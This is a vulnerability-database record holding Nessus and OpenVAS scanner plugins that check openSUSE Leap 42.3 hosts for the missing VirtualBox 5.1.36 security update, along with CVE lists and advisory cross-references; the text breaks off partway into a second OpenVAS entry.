{"id": "OPENSUSE-2018-389.NASL", "bulletinFamily": "scanner", "title": "openSUSE Security Update : virtualbox (openSUSE-2018-389) (Optionsbleed)", "description": "This update for VirtualBox to version 5.1.36 fixes multiple issues :\n\nSecurity issues fixed :\n\n - CVE-2018-0739: Unauthorized remote attacker may have\n caused a hang or frequently repeatable crash (complete\n DOS)\n\n - CVE-2018-2830: Attacker with host login may have\n compromised Virtualbox or further system services after\n interaction with a third user\n\n - CVE-2018-2831: Attacker with host login may have\n compromised VirtualBox or further system services,\n allowing read access to some data\n\n - CVE-2018-2835: Attacker with host login may have gained\n control over VirtualBox and possibly further system\n services after interacting with a third user\n\n - CVE-2018-2836: Attacker with host login may have gained\n control over VirtualBox and possibly further system\n services after interacting with a third user\n\n - CVE-2018-2837: Attacker with host login may have gained\n control over VirtualBox and possibly further system\n services after interacting with a third user\n\n - CVE-2018-2842: Attacker with host login may have gained\n control over VirtualBox and possibly further system\n services after interacting with a third user\n\n - CVE-2018-2843: Attacker with host login may have gained\n control over VirtualBox and possibly further system\n services after interacting with a third user \n\n - CVE-2018-2844: Attacker with host login may have gained\n control over VirtualBox and possibly further system\n services after interacting with a third user \n\n - CVE-2018-2845: Attacker with host login may have caused\n a hang or frequently repeatable crash (complete DOS),\n and perform unauthorized read and write operation to\n some VirtualBox accessible data\n\n - CVE-2018-2860: Privileged attacker may have gained\n control over VirtualBox and possibly further system\n services\n\nhttp://www.oracle.com/technetwork/security-advisory/cpuapr2018verbose-\n3678108.html\nhttp://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067\n.html#AppendixOVIR\n\nThis update also contains all upstream fixes and improvements in the\nstable 5.1.36 release.", "published": "2018-04-24T00:00:00", "modified": "2018-04-24T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/109294", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?05e0bcf5", "https://bugzilla.opensuse.org/show_bug.cgi?id=1089997", "http://www.nessus.org/u?7eca6abf"], "cvelist": ["CVE-2018-2836", "CVE-2017-9798", "CVE-2018-2860", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2845", "CVE-2017-3737", "CVE-2018-2837", "CVE-2018-0739", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2843"], "type": "nessus", "lastseen": "2021-01-20T12:37:07", "edition": 17, "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310813302", "OPENVAS:1361412562310813304", "OPENVAS:1361412562310112048", "OPENVAS:1361412562310873446", "OPENVAS:1361412562311220171252", "OPENVAS:1361412562310813303", "OPENVAS:1361412562310851869", "OPENVAS:1361412562311220171253", "OPENVAS:1361412562310843313", "OPENVAS:1361412562310851734"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:2524-1", "OPENSUSE-SU-2018:1057-1"]}, {"type": "kaspersky", "idList": ["KLA11236"]}, {"type": "nessus", "idList": ["ORACLE_SECURE_GLOBAL_DESKTOP_APR_2018_CPU.NASL", "VIRTUALBOX_5_2_10.NASL", "EULEROS_SA-2017-1252.NASL", "DEBIAN_DSA-3980.NASL", "SUSE_SU-2017-2542-1.NASL", "FEDORA_2017-A52F252521.NASL", "GENTOO_GLSA-201805-08.NASL", "OPENSUSE-2018-938.NASL", "DEBIAN_DLA-1102.NASL", "SECURITYCENTER_OPENSSL_1_0_2N.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201805-08"]}, {"type": "cve", "idList": ["CVE-2018-2836", "CVE-2018-2835", "CVE-2018-2831", "CVE-2018-2845", "CVE-2017-3737", "CVE-2018-2837", "CVE-2017-9798", "CVE-2018-2844", "CVE-2018-2843", "CVE-2018-2860"]}, {"type": "attackerkb", "idList": ["AKB:D0F5AA2A-4D99-41A6-9F83-6D0EA1AD01FC"]}, {"type": "f5", "idList": ["F5:K08044291", "F5:K70084351", "F5:K43452233"]}, {"type": "hackerone", "idList": ["H1:269568"]}, {"type": "aix", "idList": ["OPENSSL_ADVISORY25.ASC", "OPENSSL_ADVISORY26.ASC"]}, {"type": "seebug", "idList": ["SSV:96537", "SSV:97082"]}, {"type": "exploitdb", "idList": ["EDB-ID:45372", "EDB-ID:42745"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D9276C7F60D6CECB06FC28389FF1B36D", "EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D"]}, {"type": "zdi", "idList": ["ZDI-18-782", "ZDI-18-305", "ZDI-18-303", "ZDI-18-783", "ZDI-18-302", "ZDI-18-304"]}, {"type": "httpd", "idList": ["HTTPD:42FA2547862AB3B3F5E7F776E2D90614", "HTTPD:3647863A8E4AE972669D5EE60974E777", "HTTPD:FDE6D747713B6B9D98F74AC2CD3A4CA7", "HTTPD:5D6E315A1B98558C0DF8CBE51264FBA5"]}, {"type": "ubuntu", "idList": ["USN-3425-2", "USN-3425-1"]}, {"type": "archlinux", "idList": ["ASA-201709-15"]}, {"type": "redhat", "idList": ["RHSA-2017:3018", "RHSA-2017:2882"]}, {"type": "fedora", "idList": ["FEDORA:A9847604E850", "FEDORA:092E9605F081"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3980-1:C7ED3", "DEBIAN:DLA-1102-1:7F277"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-2882"]}, {"type": "zdt", "idList": ["1337DAY-ID-28573"]}, {"type": "amazon", "idList": ["ALAS-2017-896"]}, {"type": "centos", "idList": ["CESA-2017:2882"]}, {"type": "freebsd", "idList": ["76B085E2-9D33-11E7-9260-000C292EE6B8"]}, {"type": "slackware", "idList": ["SSA-2017-261-01"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2017-3737"]}, {"type": "ics", "idList": ["ICSA-18-226-02"]}], "modified": "2021-01-20T12:37:07", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2021-01-20T12:37:07", "rev": 2}, "vulnersScore": 6.3}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-389.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109294);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-3737\", \"CVE-2017-9798\", \"CVE-2018-0739\", \"CVE-2018-2830\", \"CVE-2018-2831\", \"CVE-2018-2835\", \"CVE-2018-2836\", \"CVE-2018-2837\", \"CVE-2018-2842\", \"CVE-2018-2843\", \"CVE-2018-2844\", \"CVE-2018-2845\", \"CVE-2018-2860\");\n\n script_name(english:\"openSUSE Security Update : virtualbox (openSUSE-2018-389) (Optionsbleed)\");\n script_summary(english:\"Check for the openSUSE-2018-389 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for VirtualBox to version 5.1.36 fixes multiple issues :\n\nSecurity issues fixed :\n\n - CVE-2018-0739: Unauthorized remote attacker may have\n caused a hang or frequently repeatable crash (complete\n DOS)\n\n - CVE-2018-2830: Attacker with host login may have\n compromised Virtualbox or further system services after\n interaction with a third user\n\n - CVE-2018-2831: Attacker with host login may have\n compromised VirtualBox or further system services,\n allowing read access to some data\n\n - CVE-2018-2835: Attacker with host login may have gained\n control over VirtualBox and possibly further system\n services after interacting with a third user\n\n - CVE-2018-2836: Attacker with host login may have gained\n control over VirtualBox and possibly further system\n services after interacting with a third user\n\n - CVE-2018-2837: Attacker with host login may have gained\n control over VirtualBox and possibly further system\n services after interacting with a third user\n\n - CVE-2018-2842: Attacker with host login may have gained\n control over VirtualBox and possibly further system\n services after interacting with a third user\n\n - CVE-2018-2843: Attacker with host login may have gained\n control over VirtualBox and possibly further system\n services after interacting with a third user \n\n - CVE-2018-2844: Attacker with host login may have gained\n control over VirtualBox and possibly further system\n services after interacting with a third user \n\n - CVE-2018-2845: Attacker with host login may have caused\n a hang or frequently repeatable crash (complete DOS),\n and perform unauthorized read and write operation to\n some VirtualBox accessible data\n\n - CVE-2018-2860: Privileged attacker may have gained\n control over VirtualBox and possibly further system\n services\n\nhttp://www.oracle.com/technetwork/security-advisory/cpuapr2018verbose-\n3678108.html\nhttp://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067\n.html#AppendixOVIR\n\nThis update also contains all upstream fixes and improvements in the\nstable 5.1.36 release.\"\n );\n # http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html#AppendixOVIR\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?05e0bcf5\"\n );\n # http://www.oracle.com/technetwork/security-advisory/cpuapr2018verbose-3678108.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7eca6abf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1089997\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected virtualbox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-desktop-icons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-vnc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"python-virtualbox-5.1.36-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"python-virtualbox-debuginfo-5.1.36-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-5.1.36-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-debuginfo-5.1.36-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-debugsource-5.1.36-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-devel-5.1.36-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-guest-desktop-icons-5.1.36-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-guest-kmp-default-5.1.36_k4.4.126_48-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-guest-kmp-default-debuginfo-5.1.36_k4.4.126_48-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-guest-source-5.1.36-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-guest-tools-5.1.36-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-guest-tools-debuginfo-5.1.36-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-guest-x11-5.1.36-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-guest-x11-debuginfo-5.1.36-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-host-kmp-default-5.1.36_k4.4.126_48-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-host-kmp-default-debuginfo-5.1.36_k4.4.126_48-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-host-source-5.1.36-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-qt-5.1.36-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-qt-debuginfo-5.1.36-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-vnc-5.1.36-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-websrv-5.1.36-50.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-websrv-debuginfo-5.1.36-50.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-virtualbox / python-virtualbox-debuginfo / virtualbox / etc\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "109294", "cpe": ["p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-tools", "p-cpe:/a:novell:opensuse:virtualbox-qt", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-debugsource", "p-cpe:/a:novell:opensuse:python-virtualbox", "p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default", "p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-vnc", "p-cpe:/a:novell:opensuse:virtualbox-guest-source", "p-cpe:/a:novell:opensuse:virtualbox-websrv", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:virtualbox-guest-x11", "p-cpe:/a:novell:opensuse:virtualbox-host-source", "p-cpe:/a:novell:opensuse:virtualbox-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-devel", "p-cpe:/a:novell:opensuse:virtualbox", "p-cpe:/a:novell:opensuse:virtualbox-guest-desktop-icons"], "scheme": null, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}}

{"openvas": [{"lastseen": "2020-01-31T17:40:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2836", "CVE-2017-9798", "CVE-2018-2860", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2845", "CVE-2017-3737", "CVE-2018-2837", "CVE-2018-0739", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2843"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2018-04-25T00:00:00", "id": "OPENVAS:1361412562310851734", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851734", "type": "openvas", "title": "openSUSE: Security Advisory for virtualbox (openSUSE-SU-2018:1057-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851734\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 08:40:14 +0200 (Wed, 25 Apr 2018)\");\n script_cve_id(\"CVE-2017-3737\", \"CVE-2017-9798\", \"CVE-2018-0739\", \"CVE-2018-2830\",\n \"CVE-2018-2831\", \"CVE-2018-2835\", \"CVE-2018-2836\", \"CVE-2018-2837\",\n \"CVE-2018-2842\", \"CVE-2018-2843\", \"CVE-2018-2844\", \"CVE-2018-2845\",\n \"CVE-2018-2860\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for virtualbox (openSUSE-SU-2018:1057-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'virtualbox'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for VirtualBox to version 5.1.36 fixes multiple issues:\n\n Security issues fixed:\n\n - CVE-2018-0739: Unauthorized remote attacker may have caused a hang or\n frequently repeatable crash (complete DOS)\n\n - CVE-2018-2830: Attacker with host login may have compromised Virtualbox\n or further system services after interaction with a third user\n\n - CVE-2018-2831: Attacker with host login may have compromised VirtualBox\n or further system services, allowing read access to some data\n\n - CVE-2018-2835: Attacker with host login may have gained control over\n VirtualBox and possibly further system services after interacting with a\n third user\n\n - CVE-2018-2836: Attacker with host login may have gained control over\n VirtualBox and possibly further system services after interacting with a\n third user\n\n - CVE-2018-2837: Attacker with host login may have gained control over\n VirtualBox and possibly further system services after interacting with a\n third user\n\n - CVE-2018-2842: Attacker with host login may have gained control over\n VirtualBox and possibly further system services after interacting with a\n third user\n\n - CVE-2018-2843: Attacker with host login may have gained control over\n VirtualBox and possibly further system services after interacting with a\n third user\n\n - CVE-2018-2844: Attacker with host login may have gained control over\n VirtualBox and possibly further system services after interacting with a\n third user\n\n - CVE-2018-2845: Attacker with host login may have caused a hang or\n frequently repeatable crash (complete DOS), and perform unauthorized\n read and write operation to some VirtualBox accessible data\n\n - CVE-2018-2860: Privileged attacker may have gained control over\n VirtualBox and possibly further system services\n\n #AppendixOVIR\n\n This update also contains all upstream fixes and improvements in the\n stable 5.1.36 release.\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-389=1\");\n\n script_tag(name:\"affected\", value:\"virtualbox on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:1057-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-04/msg00069.html\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2018verbose-36781\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-desktop-icons\", rpm:\"virtualbox-guest-desktop-icons~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-source\", rpm:\"virtualbox-guest-source~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-source\", rpm:\"virtualbox-host-source~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-virtualbox\", rpm:\"python-virtualbox~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-virtualbox-debuginfo\", rpm:\"python-virtualbox-debuginfo~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox\", rpm:\"virtualbox~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-debuginfo\", rpm:\"virtualbox-debuginfo~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-debugsource\", rpm:\"virtualbox-debugsource~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-devel\", rpm:\"virtualbox-devel~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default\", rpm:\"virtualbox-guest-kmp-default~5.1.36_k4.4.126_48~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default-debuginfo\", rpm:\"virtualbox-guest-kmp-default-debuginfo~5.1.36_k4.4.126_48~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-tools\", rpm:\"virtualbox-guest-tools~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-tools-debuginfo\", rpm:\"virtualbox-guest-tools-debuginfo~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-x11\", rpm:\"virtualbox-guest-x11~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-x11-debuginfo\", rpm:\"virtualbox-guest-x11-debuginfo~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-default\", rpm:\"virtualbox-host-kmp-default~5.1.36_k4.4.126_48~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-default-debuginfo\", rpm:\"virtualbox-host-kmp-default-debuginfo~5.1.36_k4.4.126_48~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-qt\", rpm:\"virtualbox-qt~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-qt-debuginfo\", rpm:\"virtualbox-qt-debuginfo~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-vnc\", rpm:\"virtualbox-vnc~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-websrv\", rpm:\"virtualbox-websrv~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-websrv-debuginfo\", rpm:\"virtualbox-websrv-debuginfo~5.1.36~50.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-07-17T14:18:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2836", "CVE-2018-2860", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2845", "CVE-2018-2837", "CVE-2018-0739", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2843"], "description": "The host is installed with Oracle VM\n VirtualBox and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-04-18T00:00:00", "id": "OPENVAS:1361412562310813302", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813302", "type": "openvas", "title": "Oracle VirtualBox Security Updates (apr2018-3678067) 01 - Windows", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle VirtualBox Security Updates (apr2018-3678067) 01 - Windows\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 